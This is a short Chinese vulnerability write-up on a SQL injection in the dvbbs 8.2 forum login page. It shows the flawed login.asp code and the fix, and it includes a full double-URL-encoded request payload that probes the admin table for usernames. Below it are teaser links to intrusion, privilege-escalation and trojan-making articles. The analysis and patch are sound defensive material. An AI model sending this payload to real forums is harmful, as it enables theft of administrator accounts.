dvbbs 8.2 SQL Injection注射漏洞分析

更新時間：2008年05月31日 12:19:06 作者：

利用方式:一個典型的sql注射漏洞,按照公告里說的用

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可觸發(fā).

漏洞分析:動網在asp領域也算一個比較元老的程序,這次在8.2新版里有一個低級的錯誤.漏洞代碼在login.asp 118行左右

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先經過檢查然后再unescape解碼,導致用urlencode模式就可以饒過任何檢查,和php的urldecode導致的注射很類似,譬如用%2527就可以提交'過去了.

修補方案:修補也很簡單,將上述代碼改成

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......

一些通用跳轉地址，XXOXX的時候有點用
近日在寫exploit的時候需要用到一些其他語言的call ebx的跳轉地址，但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機器的跳轉地址，所以費了點時間收集了下，在這里要感謝傲少提供的機器給我去找地址?，F(xiàn)在貼到這里，方便大家。
2008-09-09
$創(chuàng)建c:\con.txt嗎？windows文件系統(tǒng)漏洞$
創(chuàng)建c:\con.txt嗎？windows文件系統(tǒng)漏洞
2008-01-01
Mysql提權方法利用
Mysql提權方法利用...
2007-06-06
常用軟件的靜默安裝方法介紹
大部分軟件，其安裝都具備一定的智能性，換句話說，許多軟件的安裝都能采取全自動或半自動的方式進行
2007-03-03
sql server注入建立虛擬目錄的方法
2008-01-01
Ring的權限提升21中方法
Ring的權限提升21中方法...
2007-06-06
linux提權用的一個技巧
一個linux提權用的技巧，放出來全當找工作攢RP了。 OK，通常情況下，我們在執(zhí)行bash腳本的時候，有一個執(zhí)行過程，其中有一點比較重要:如果BASH_ENV被設置的話，它就會執(zhí)行BASH_ENV指向的腳本
2008-09-09
入侵ASP.net網站的經驗附利用代碼
愛好入侵的可以用下面的方法，做網站的朋友就需要了解下面的asp.net的利用代碼，最好來測試下
2008-06-06
SQL Injection with MySQL 注入分析
本文作者：angel文章性質：原創(chuàng)　國內能看到php+Mysql注入的文章可能比較少，但是如果關注各種WEB程序的漏洞，就可以發(fā)現(xiàn)，其實這些漏洞的文章其實就是一個例子。
2008-05-05
CHM電子書木馬制作攻略教程
CHM電子書木馬制作攻略教程...
2007-06-06